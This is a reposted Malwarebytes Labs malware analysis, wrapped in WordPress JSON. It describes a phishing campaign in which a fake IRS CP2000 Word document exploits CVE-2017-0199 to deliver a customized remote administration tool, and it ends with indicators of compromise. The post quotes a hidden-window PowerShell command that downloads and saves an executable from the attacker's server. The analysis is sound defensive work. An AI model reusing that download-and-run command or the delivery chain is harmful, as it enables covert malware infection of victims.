{"id":9439,"date":"2017-09-21T08:10:16","date_gmt":"2017-09-21T16:10:16","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/09\/21\/news-3212\/"},"modified":"2017-09-21T08:10:16","modified_gmt":"2017-09-21T16:10:16","slug":"news-3212","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/09\/21\/news-3212\/","title":{"rendered":"Fake IRS notice delivers customized spying tool"},"content":{"rendered":"

Credit to Author: J\u00e9r\u00f4me Segura| Date: Thu, 21 Sep 2017 15:00:24 +0000<\/strong><\/p>\n

While macro-based documents and scripts make up for the majority of malspam attacks these days, we also see some campaigns that leverage documents embedded with exploits. Case in point, we came across a malicious Microsoft Office file disguised as a CP2000 notice<\/a>. The Internal Revenue Service (IRS) usually mails out this letter to taxpayers when\u00a0information is incorrectly reported on a previous return.<\/p>\n

Victims that fall for the scam will infect themselves with a custom\u00a0Remote Administration Tool. A RAT can be utilized for legitimate purposes, for example by a system administrator, but it can also be used without a user’s consent or knowledge to remotely control their machine, view and delete files or deploy a keylogger to silently capture keystrokes.<\/p>\n

In this blog post, we will review this exploit’s delivery mechanism and take a look at the remote tool it deploys.<\/p>\n

Distribution<\/h3>\n

The malicious document is hosted on a remote server and users are most likely enticed to open it via a link from a phishing email.\u00a0The file contains an OLE2 embedded link object which retrieves a malicious HTA script from a remote server and executes it. In turn, it downloads the final payload, all with very little user interaction required since it is using CVE-2017-0199<\/a>,\u00a0first uncovered<\/a> in April 2017 as a zero-day.<\/p>\n

82.211.30[.]108\/css\/CP2000IRS.doc<\/strong>  \"\"<\/a><\/pre>\n
The embedded link points to an HTA script hosted under an unexpected location – a Norwegian company’s\u00a0compromised FTP server – which invokes PowerShell to download and execute the actual malware payload.<\/p>\n
ftp:\/\/lindrupmartinsen[.]no:21\/httpdocs\/test\/template.hta  \"\"<\/a>  \"C:WindowsSystem32WindowsPowerShellv1.0powershell.exe\"   -WindowStyle Hidden (New-Object System.Net.WebClient)  .DownloadFile('http:\/\/82.211.30[.]108\/css\/intelgfx.exe',  'C:Users[username]AppDataRoaming62962.exe');<\/pre>\n
Payload<\/h3>\n
The downloaded payload (intelgfx.exe<\/em>) extracts to several components into a local folder and achieves persistence using a decoy shortcut. The VBS scripts ensure that the main module runs without showing its GUI, in order to remain invisible to the victim.<\/p>\n
\"\"<\/a><\/p>\n
RMS agent stands for Remote Manipulator System<\/a> and is a remote control application made by a Russian company. It appears that in this case, the attackers took the original program (as pictured below) and slightly customized it, not to mention the fact that they are using it for nefarious purposes, namely spying on their victims.<\/p>\n
\"\"<\/p>\n
Its source code shows the debugging path information and name that they gave to the module.<\/p>\n
\"\"<\/a><\/p>\n
Office exploits and RATs<\/h3>\n
This is not the first time that CVE-2017-0199 is used to distribute a RAT. Last August, TrendMicro described<\/a> an attack where the same exploit was adapted for PowerPoint and used to deliver the REMCOS RAT. It also shows that threat actors often repackage existing toolkits – which can be legitimate – and turn them into full-fledged spying applications.<\/p>\n
We reported the compromised FTP server to its owner.\u00a0Malwarebytes<\/a> users were already protected against CVE-2017-0199 as well as its payload which is detected as Backdoor.Bot<\/em>.<\/p>\n
\"\"<\/p>\n
Thanks to @hasherezade<\/a> for help with payload analysis.<\/em><\/p>\n
Indicators of compromise<\/h3>\n
Word doc CVE-2017-0199<\/strong><\/p>\n
82.211.30[.]108\/css\/CP2000IRS.doc  47ee31f74b6063fab028111e2be6b3c2ddab91d48a98523982e845f9356979c1<\/pre>\n
HTA script<\/strong><\/p>\n
ftp:\/\/lindrupmartinsen[.]no:21\/httpdocs\/test\/template.hta  d01b6d9507429df065b9b823e763a043aa38b722419d35f29a587c893b3008a5<\/pre>\n
Main package (intelgfx.exe)<\/strong><\/p>\n
82.211.30[.]108\/css\/intelgfx.exe  924aa03c953201f303e47ddc4825b86abb142edb6c5f82f53205b6c0c61d82c8<\/pre>\n
RAT module<\/strong><\/p>\n
4d0e5ebb4d64adc651608ff4ce335e86631b0d93392fe1e701007ae6187b7186<\/pre>\n
Other IOCs from same distribution server<\/strong><\/p>\n
82.211.30[.]108\/estate.xml  82.211.30[.]108\/css\/qbks.exe<\/pre>\n
The post Fake IRS notice delivers customized spying tool<\/a> appeared first on Malwarebytes Labs<\/a>.<\/p>\n
https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Credit to Author: J\u00e9r\u00f4me Segura| Date: Thu, 21 Sep 2017 15:00:24 +0000<\/strong><\/p>\n\n\n\n
<\/a><\/td>\n<\/tr>\n
Threat actors leverage a Microsoft Office exploit to spy on their victims. In this blog post, we will review its delivery mechanism and analyze the malware we observed, a modified version of a commercial Remote Administration Tool (RAT).<\/p>\n
Categories: <\/p>\n